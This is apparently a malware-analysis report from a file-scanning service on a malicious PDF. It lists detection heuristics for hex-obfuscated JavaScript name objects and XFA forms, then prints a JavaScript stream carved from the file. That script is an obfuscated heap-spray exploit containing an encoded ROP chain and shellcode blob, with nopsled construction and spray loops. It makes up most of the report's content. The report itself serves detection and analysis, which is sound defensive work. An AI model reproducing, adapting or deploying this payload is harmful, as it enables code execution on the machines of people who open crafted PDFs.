MALICIOUS
178
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 0.9401
Heuristics 7
-
ClamAV: Heuristics.PDF.ObfuscatedNameObject critical CLAMAV_DETECTIONClamAV detected this file as malware: Heuristics.PDF.ObfuscatedNameObject
-
Hex-obfuscated scripting name object critical PDF_OBFUSCATED_NAME_OBJECTA PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
XFA form low PDF_XFAPDF uses XML Forms Architecture — can contain script logic
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xdp/ In PDF document text
- http://www.xfa.org/schema/xci/2.6/In PDF document text
- http://www.xfa.org/schema/xfa-template/2.6/In PDF document text
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0012_000.js |
pdf-javascript-stream | PDF /JS object 12 at offset 0xA1E0 | 3807 bytes |
SHA-256: 4f1c7e5fe610d6bd2644ee784607b7ac5a925605fa5d8c84a62a0bf1c7a7e2b3 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
8 of 12 identifiers look randomly generated (e.g. 'GIIPpeoPDhKvWPkGCbSooXEXquGhwynguwFIIsQi') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var KTegdppZJAMakPDGSHJcnPiaalFoIfNVBANmUsIjnwIgzOuOGEMSucfMAbpxtJSyOFRrQkZHwt = unescape; var sSXcnPRQIJenlYcVoIPLVzJYIOKMwfzwNmLrEgoEItvQZsqaBAdcffbdatyeptSABDjkhbbqlGOotwUbMUEyR = KTegdppZJAMakPDGSHJcnPiaalFoIfNVBANmUsIjnwIgzOuOGEMSucfMAbpxtJSyOFRrQkZHwt( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uc0db%u74d9%uf424%uf5ba%u3362%u5ee4%uc92b%u64b1%uc683%u3104%u1356%ua303%ud171%ub711%u9a9e%u47da%uc55f%u95eb%ue0d6%u9268%udabb%uf6fb%u9037%ue2ae%u5976%u78c5%uaa51%u366d%u8587%u6a51%u84fb%u702d%u6728%ubb0f%u663d%u0a48%u874b%udb04%u0538%u68b9%u967c%ubeb8%ua60a%ubbc2%u53cd%uc27f%u101d%ue427%uf49c%uac53%uaa86%ue5e6%u76c3%u7ea0%u0c1f%u7f03%uc461%ubf55%u29ce%u325a%u6d0e%uac5d%u8565%u519d%u5e7e%u8ddf%u410b%u4647%ua5ab%u8b79%u2d2a%u6075%u6938%u779a%u01ed%ufca6%uc610%u462e%uc237%u1d6b%u5356%uf0d6%u8367%uadbe%ucfcd%ub82d%u3072%uc5ae%ua72e%u5c3f%u37a5%ue9a8%u562c%u4141%ueac7%u4fe6%u0c10%ubedd%ua1c5%u938d%u16aa%u295a%ue01b%ub23d%u4176%u2611%u357a%udec6%ub8c7%u1ee8%u0bd0%u1ee8%u4320%u7aad%ueb7a%ue649%u5c1d%udfc3%u3897%u6b8c%ud731%ud621%u7f88%uafff%uc95f%u1eb4%ua42e%ua01c%u5efe%u29f6%u5861%ufc07%ua317%u96ab%u1e27%ue2a4%u0d7b%ubd67%ue728%uaaef%u299a%ud3cb%ua0f0%u2141%ua4a4%u0615%u355a%u889f%u3130%u22cf%u6fda%uc787%u11a2%ud8d1%u7dfe%u758d%ud452%u5459%uc052%u59e2%u758f%ud0d4%u1e26%u095d%ude47%u6935%uebb7%u8e25%u5be2%ubdd3%u9465%u9fae%uab20%ub504%u3b8c%u59a7%ubc0d%u59cf%ufc0d%u0a0f%ua465%uffab%uab90%u6c61%u0709%u7503%ucff9%u5913%u1006%ucf47%u026e%u66f1%udd8c%ufd28%u5691%u761e%u9616%u0d63%uedd9%u5586%u5219%u0ca1%u9262%uffce%u5fa5%uce1f%ua7e3%u0271%ue83c%u53a3%u3d0f%u41bc' ); var KyNgDYokohEuvzgg = KTegdppZJAMakPDGSHJcnPiaalFoIfNVBANmUsIjnwIgzOuOGEMSucfMAbpxtJSyOFRrQkZHwt( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" ); while (KyNgDYokohEuvzgg.length + 20 + 8 < 65536) KyNgDYokohEuvzgg+=KyNgDYokohEuvzgg; HyTKIorSxQPxSVpSKb = KyNgDYokohEuvzgg.substring(0, (0x0c0c-0x24)/2); HyTKIorSxQPxSVpSKb += sSXcnPRQIJenlYcVoIPLVzJYIOKMwfzwNmLrEgoEItvQZsqaBAdcffbdatyeptSABDjkhbbqlGOotwUbMUEyR; HyTKIorSxQPxSVpSKb += KyNgDYokohEuvzgg; xjPQdlUsOKNwIMzCJtTSXzUuwlqFXiZaPDoPPfOjnm = HyTKIorSxQPxSVpSKb.substring(0, 65536/2); while(xjPQdlUsOKNwIMzCJtTSXzUuwlqFXiZaPDoPPfOjnm.length < 0x80000) xjPQdlUsOKNwIMzCJtTSXzUuwlqFXiZaPDoPPfOjnm += xjPQdlUsOKNwIMzCJtTSXzUuwlqFXiZaPDoPPfOjnm; GIIPpeoPDhKvWPkGCbSooXEXquGhwynguwFIIsQidiSblcUZMtDdWxDpDTrepwGsYXiGXsjLYDpWdozhvXAcfcIKbHSYunSZzxh = xjPQdlUsOKNwIMzCJtTSXzUuwlqFXiZaPDoPPfOjnm.substring(0, 0x80000 - (0x1020-0x08) / 2); var dysPaZlPXCmqcVycmpAOGyZPUBvzPSZGjAsGGMLbyFxbGqTMNveAyMPsatdgcpBBQmaiZfJTffYw = new Array(); for (olQjHftCDYFSKOqtEY=0;olQjHftCDYFSKOqtEY<0x1f0;olQjHftCDYFSKOqtEY++) dysPaZlPXCmqcVycmpAOGyZPUBvzPSZGjAsGGMLbyFxbGqTMNveAyMPsatdgcpBBQmaiZfJTffYw[olQjHftCDYFSKOqtEY]=GIIPpeoPDhKvWPkGCbSooXEXquGhwynguwFIIsQidiSblcUZMtDdWxDpDTrepwGsYXiGXsjLYDpWdozhvXAcfcIKbHSYunSZzxh+"s"; |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.